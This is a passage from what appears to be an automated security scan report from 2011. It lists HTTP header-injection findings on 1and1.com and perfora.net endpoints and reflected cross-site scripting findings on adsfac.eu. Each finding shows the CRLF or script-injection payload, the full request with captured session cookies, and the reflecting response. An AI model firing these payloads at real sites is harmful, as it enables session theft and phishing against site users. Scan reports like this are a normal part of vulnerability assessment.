Cookie: emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2lTHzFUwMc9tG_kstw966Ml:1318723912553; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:12:36 GMT
Server: Apache
Location: http://mywebsite.1and1.com:80/;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__reuse=1318723956412&__lf=Static1d2d8
4b0a099611f

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: _ut=LcWY2ZFxXWS5XV1dRZFphJ19ZPS85cmVfN05BOyMnJCQjIiAgJB0eHBs0NSstLCsoTTtnXF5sJSQiUipUYykcHTE3NS8vNCoxKSwvMGhpLyIrW2QqHR4bODYwMDUrMiotMA==; Expires=Fri, 03-Nov-2079 03:26:43 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.11. http://mywebsitepersonal.1and1.com/create-personal-website [__lf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mywebsitepersonal.1and1.com
Path:   /create-personal-website

Issue detail

The value of the __lf request parameter is copied into the Location response header. The payload 1e4d2%0d%0aaf47e65b5a was submitted in the __lf parameter. This caused a response containing an injected HTTP header.

Request

GET /create-personal-website;jsessionid=F1E6BADB229760CEAA9FD35CE214E72F.TCpfix223b?startClub=false&__lf=1e4d2%0d%0aaf47e65b5a&__rd=ac170c55P5SqPtlGgDqAkvhpyGHa9HP2&origin[site]=PU.NGH.US&origin[page]=build-website&ucuoId=PUlead%3Adefault.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a HTTP/1.1
Host: mywebsitepersonal.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mywebsite.1and1.com/;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__reuse=1318723908161&__lf=Static
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:2:AAABMwoSV1xjeIGFZAlpKqGNb2QXMatX:1318723934044; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:13:31 GMT
Server: Apache
Location: http://mywebsitepersonal.1and1.com:80/;jsessionid=F1E6BADB229760CEAA9FD35CE214E72F.TCpfix223b?__reuse=1318724011866&__lf=1e4d2
af47e65b5a

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: _ut=9ZlsrWVFMTjpjY2NdcGZtM2tlMiQuZ1pULEM2MBgcMDAvLiwsMCkqKCgmKiAiISAdQjBcUVN4MTAwXjZgbzUoKSYsKiQkKSImHSAiJXR1Oy43Z3A2KSonLSslJSojJx4hIw==; Expires=Fri, 03-Nov-2079 03:27:38 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.12. http://order.1and1.com/Jumpto [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /Jumpto

Issue detail

The value of the jsessionid request parameter is copied into the Location response header. The payload 47245%0d%0a60df6232878 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a?__lf=Static47245%0d%0a60df6232878&site=PU.NGH.US&origin.page=Home&page=build-website&linkOrigin=Home&linkId=hd.nav.diy HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://order.1and1.com/;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __PFIX_TST_=3a1bb04efa928c00; variant.configname=2011-09-16; variant="bGVhZDpkZWZhdWx0""; UT=DYlcnbGRfYTZfX19ZbGJpL2dhLiAqY1ZQKD9JQysvLCwrKigoLCUmJCMjKBweHRwZPkNvZGZ0LS4qWTJcazEkJSIoJiAgJCMjNTExOHBxNyozY2wyJSYjKSchISUkJB8yMg==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2lTHzFUwMc9tG_kstw966Ml:1318723912553; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; lastpage=Home

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:12:29 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=25F9478E2046C94EAA509963E4903167.TCpfix241a&origin.page=Home&target.site=PU.NGH.US&target.page=build-website&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&__lf=Static47245
60df6232878

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=8Z1wsWlJNTyRkZGRecWduNGxmMyUvaFtVLUQ3MRkdGjEwLy0tMSorKSgoLSEjIiEeQzFdUlRiMjMvXjdhcDYpKictKyUlKSgoIx8fJl52PC84aHE3KisoLiwmJiopKSQgIA==; Expires=Fri, 03-Nov-2079 03:26:37 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.13. http://order.1and1.com/Jumpto [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /Jumpto

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload e2d51%0d%0af6b299eb523 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a?__lf=Static&site=PU.NGH.US&origin.page=Home&page=build-website&linkOrigin=Home&linkId=hd.nav.diy&e2d51%0d%0af6b299eb523=1 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://order.1and1.com/;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __PFIX_TST_=3a1bb04efa928c00; variant.configname=2011-09-16; variant="bGVhZDpkZWZhdWx0""; UT=DYlcnbGRfYTZfX19ZbGJpL2dhLiAqY1ZQKD9JQysvLCwrKigoLCUmJCMjKBweHRwZPkNvZGZ0LS4qWTJcazEkJSIoJiAgJCMjNTExOHBxNyozY2wyJSYjKSchISUkJB8yMg==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2lTHzFUwMc9tG_kstw966Ml:1318723912553; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; lastpage=Home

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:14:52 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=25F9478E2046C94EAA509963E4903167.TCpfix241a&origin.page=Home&target.site=PU.NGH.US&target.page=build-website&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&e2d51
f6b299eb523
=1&__lf=Static
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Ra2AwXlZRUyhRUVFLdWtyOHBqNykzbF9ZMUg7NR0hHh4dHBoxNS4vLSwsMSUnJiUiRzVhVlhmHyAcSztldDotLisxLykpLSwsJyMjKmJjKRwlbHU7Li8sMjAqKi4tLSgkJA==; Expires=Fri, 03-Nov-2079 03:28:59 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.14. http://order.1and1.com/Jumpto [origin.page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /Jumpto

Issue detail

The value of the origin.page request parameter is copied into the Location response header. The payload 654e6%0d%0a476e9112dfd was submitted in the origin.page parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a?__lf=Static&site=PU.NGH.US&origin.page=654e6%0d%0a476e9112dfd&page=build-website&linkOrigin=Home&linkId=hd.nav.diy HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://order.1and1.com/;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __PFIX_TST_=3a1bb04efa928c00; variant.configname=2011-09-16; variant="bGVhZDpkZWZhdWx0""; UT=DYlcnbGRfYTZfX19ZbGJpL2dhLiAqY1ZQKD9JQysvLCwrKigoLCUmJCMjKBweHRwZPkNvZGZ0LS4qWTJcazEkJSIoJiAgJCMjNTExOHBxNyozY2wyJSYjKSchISUkJB8yMg==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2lTHzFUwMc9tG_kstw966Ml:1318723912553; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; lastpage=Home

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:12:59 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=25F9478E2046C94EAA509963E4903167.TCpfix241a&origin.page=654e6
476e9112dfd
&target.site=PU.NGH.US&target.page=build-website&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&__lf=Static
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=HdWo6aGBbXTJbW1tVaF5lK2NdKhwmX2ljO1JFPycrKCgnJiQkKCEiIB8fJBgaMC8sUT9rYGJwKSomVS5YZy0gIR4kIhwzNzY2MS0tNGxtMyYvX2guISIfJSMdHTg3NzIuLg==; Expires=Fri, 03-Nov-2079 03:27:06 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.15. http://order.1and1.com/Jumpto [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /Jumpto

Issue detail

The value of the page request parameter is copied into the Location response header. The payload c1508%0d%0aa00c42b9c91 was submitted in the page parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a?__lf=Static&site=PU.NGH.US&origin.page=Home&page=c1508%0d%0aa00c42b9c91&linkOrigin=Home&linkId=hd.nav.diy HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://order.1and1.com/;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __PFIX_TST_=3a1bb04efa928c00; variant.configname=2011-09-16; variant="bGVhZDpkZWZhdWx0""; UT=DYlcnbGRfYTZfX19ZbGJpL2dhLiAqY1ZQKD9JQysvLCwrKigoLCUmJCMjKBweHRwZPkNvZGZ0LS4qWTJcazEkJSIoJiAgJCMjNTExOHBxNyozY2wyJSYjKSchISUkJB8yMg==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2lTHzFUwMc9tG_kstw966Ml:1318723912553; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; lastpage=Home

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:13:14 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=25F9478E2046C94EAA509963E4903167.TCpfix241a&origin.page=Home&target.site=PU.NGH.US&target.page=c1508
a00c42b9c91
&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&__lf=Static
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=3bGExX1dSVClSUlJMX2xzOXFrOCo0bWBaMkk8Nh4iHx8eHRsbNi8wLi0tMiYoJyYjSDZiV1lnICEdTCVmdTsuLywyMCoqLi0tKCQkK2NkKh0mVnY8LzAtMzErKy8uLiklJQ==; Expires=Fri, 03-Nov-2079 03:27:21 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.16. http://order.1and1.com/Jumpto [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /Jumpto

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 97bdb%0d%0aefd6c702fd1 was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a?__lf=Static&site=97bdb%0d%0aefd6c702fd1&origin.page=Home&page=build-website&linkOrigin=Home&linkId=hd.nav.diy HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://order.1and1.com/;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __PFIX_TST_=3a1bb04efa928c00; variant.configname=2011-09-16; variant="bGVhZDpkZWZhdWx0""; UT=DYlcnbGRfYTZfX19ZbGJpL2dhLiAqY1ZQKD9JQysvLCwrKigoLCUmJCMjKBweHRwZPkNvZGZ0LS4qWTJcazEkJSIoJiAgJCMjNTExOHBxNyozY2wyJSYjKSchISUkJB8yMg==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2lTHzFUwMc9tG_kstw966Ml:1318723912553; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; lastpage=Home

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:12:45 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=25F9478E2046C94EAA509963E4903167.TCpfix241a&origin.page=Home&target.site=97bdb
efd6c702fd1
&target.page=build-website&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&__lf=Static
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0YlpVVyxVVVVPYlhfJXRuOy03cGNdNUw/OSElIiIhIB4eIhscMTAwNSkrKikmSzllWlxqIyQgTyhSYScxMi81My0tMTAwKycnLmZnLSApWWIoGzMwNjQuLjIxMSwoKA==; Expires=Fri, 03-Nov-2079 03:26:52 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.17. https://webmailcluster.perfora.net/xml/webmail/Login [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://webmailcluster.perfora.net
Path:   /xml/webmail/Login

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 3d157%0d%0ac8839f14f03 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /xml/webmail/3d157%0d%0ac8839f14f03?__frame=_top HTTP/1.1
Host: webmailcluster.perfora.net
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://webmailcluster.perfora.net/xml/webmail/Login;jsessionid=9DD62E595F1975C38458ECC1B47B7EC5.TC134b?__reuse=1318724040320
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __PFIX_TST_=169a8b227ca6fc00; __PFIX_SEC_dddcfcdaee92fb44ac62c05d16000005=1318724044256:4490eb2bb01fb400

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:18:23 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7b395f35d931c000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: https://webmailcluster.perfora.net/xml/webmail/3d157
c8839f14f03
;jsessionid=248E30A91620245D24A559966813F471.TC137b?__frame=_top
Content-Length: 0
Vary: User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1


2. Cross-site scripting (reflected)  previous
There are 20 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://adsfac.eu/ag.asp [cc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.eu
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8a90"><script>alert(1)</script>217a337aa5b was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=a8a90"><script>alert(1)</script>217a337aa5b&source=iframe&;click=http://adclient.uimserv.net/event.ng/Type=click&FlightID=384821&AdID=774139&TargetID=121326&Values=c9mDkIjMpOkOmOnPjRpIHa69lMEbCq456q48yfBk638l8Gj8Go8Hj83Yh34p855l9wq9Mj9RoF73nG7wa399nH5Da535qI37lI63qI8Ea58Fa58Ga58Ia637nJ97jJ97lKYpK33pK4Aa896rMFnMPmM580&RawValues=USERIDRAW%2Cac140919-18506-1318724448-1%2CSECTIONID%2Cgm1/themen/finanzen/wirtschaft/13914150&Redirect=;ord=cbIomae,bhjuiRwbsiyA&clk= HTTP/1.1
Host: adsfac.eu
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.gmx.net/themen/finanzen/wirtschaft/508a886-rom-finanz-proteste-eskalieren
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UserID=610040839265718; FSCIT007=pctl=28473&pctm=2&FM149947=2&pctc=149947&FQ=2&fpt=0%2C28473%2C&pct%5Fdate=4294&FL28473=2

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 198
Content-Type: text/html
Expires: Sun, 16 Oct 2011 00:22:27 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: UserID=610040839265718; expires=Wed, 16-Nov-2011 01:23:26 GMT; domain=.adsfac.eu; path=/
Set-Cookie: FSa8a90%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E217a337aa5b0=uid=7014984; expires=Mon, 17-Oct-2011 00:23:26 GMT; domain=.adsfac.eu; path=/
Set-Cookie: FSa8a90%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E217a337aa5b=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4306&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Wed, 16-Nov-2011 01:23:26 GMT; domain=.adsfac.eu; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sun, 16 Oct 2011 00:23:27 GMT
Connection: close

<a href="http://adsfac.eu/link.asp?cc=a8a90"><script>alert(1)</script>217a337aa5b.0.0&CreativeID=1" target=_blank><img src="http://adsfac.eu/creative.asp?CreativeID=1" width=1 height=1 border=0></a>

2.2. http://adsfac.eu/ag.asp [clk parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.eu
Path:   /ag.asp

Issue detail

The value of the clk request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82846'%3balert(1)//bc7259a2a3e was submitted in the clk parameter. This input was echoed as 82846';alert(1)//bc7259a2a3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.asp?cc=VWA084.117885.0&source=iframe&;click=http://adclient.uimserv.net/event.ng/Type=click&FlightID=384821&AdID=774139&TargetID=121326&Values=c9mDkIjMpOkOmOnPjRpIHa69lMEbCq456q48yfBk638l8Gj8Go8Hj83Yh34p855l9wq9Mj9RoF73nG7wa399nH5Da535qI37lI63qI8Ea58Fa58Ga58Ia637nJ97jJ97lKYpK33pK4Aa896rMFnMPmM580&RawValues=USERIDRAW%2Cac140919-18506-1318724448-1%2CSECTIONID%2Cgm1/themen/finanzen/wirtschaft/13914150&Redirect=;ord=cbIomae,bhjuiRwbsiyA&clk=82846'%3balert(1)//bc7259a2a3e HTTP/1.1
Host: adsfac.eu
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.gmx.net/themen/finanzen/wirtschaft/508a886-rom-finanz-proteste-eskalieren
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UserID=610040839265718; FSCIT007=pctl=28473&pctm=2&FM149947=2&pctc=149947&FQ=2&fpt=0%2C28473%2C&pct%5Fdate=4294&FL28473=2

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 729
Content-Type: text/html
Expires: Sun, 16 Oct 2011 00:22:30 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSVWA084117885=uid=7016340; expires=Mon, 17-Oct-2011 00:23:30 GMT; domain=.adsfac.eu; path=/
Set-Cookie: FSVWA084=pctm=3&FM144706=3&fpt=0%2C117885%2C&pct%5Fdate=4306&pctl=117885&FL117885=3&pctc=144706&FQ=3; expires=Wed, 16-Nov-2011 01:23:30 GMT; domain=.adsfac.eu; path=/
Set-Cookie: UserID=610040839265718; expires=Wed, 16-Nov-2011 01:23:30 GMT; domain=.adsfac.eu; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sun, 16 Oct 2011 00:23:30 GMT
Connection: close

<html><body>
<script type="text/javascript">
if (typeof(fd_clk) == 'undefined') {var fd_clk = '82846';alert(1)//bc7259a2a3ehttp://adsfac.eu/link.asp?cc=VWA084.117885.0&CreativeID=144706';};
var fd_imp='http://cdn.adsfac.eu/ads/VWA084/144706.0.0.swf';
var fd_bak='http://adsfac.eu/creative.asp?CreativeID=144706';
var fd_b
...[SNIP]...

2.3. http://adsfac.eu/ag.asp [clk parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.eu
Path:   /ag.asp

Issue detail

The value of the clk request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dc72"><script>alert(1)</script>f885aaf88a2 was submitted in the clk parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=VWA084.117885.0&source=iframe&;click=http://adclient.uimserv.net/event.ng/Type=click&FlightID=384821&AdID=774139&TargetID=121326&Values=c9mDkIjMpOkOmOnPjRpIHa69lMEbCq456q48yfBk638l8Gj8Go8Hj83Yh34p855l9wq9Mj9RoF73nG7wa399nH5Da535qI37lI63qI8Ea58Fa58Ga58Ia637nJ97jJ97lKYpK33pK4Aa896rMFnMPmM580&RawValues=USERIDRAW%2Cac140919-18506-1318724448-1%2CSECTIONID%2Cgm1/themen/finanzen/wirtschaft/13914150&Redirect=;ord=cbIomae,bhjuiRwbsiyA&clk=4dc72"><script>alert(1)</script>f885aaf88a2 HTTP/1.1
Host: adsfac.eu
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.gmx.net/themen/finanzen/wirtschaft/508a886-rom-finanz-proteste-eskalieren
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UserID=610040839265718; FSCIT007=pctl=28473&pctm=2&FM149947=2&pctc=149947&FQ=2&fpt=0%2C28473%2C&pct%5Fdate=4294&FL28473=2

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 759
Content-Type: text/html
Expires: Sun, 16 Oct 2011 00:22:29 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSVWA084117885=uid=7015916; expires=Mon, 17-Oct-2011 00:23:28 GMT; domain=.adsfac.eu; path=/
Set-Cookie: FSVWA084=pctm=3&FM144706=3&fpt=0%2C117885%2C&pct%5Fdate=4306&pctl=117885&FL117885=3&pctc=144706&FQ=3; expires=Wed, 16-Nov-2011 01:23:28 GMT; domain=.adsfac.eu; path=/
Set-Cookie: UserID=610040839265718; expires=Wed, 16-Nov-2011 01:23:28 GMT; domain=.adsfac.eu; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sun, 16 Oct 2011 00:23:29 GMT
Connection: close

<html><body>
<script type="text/javascript">
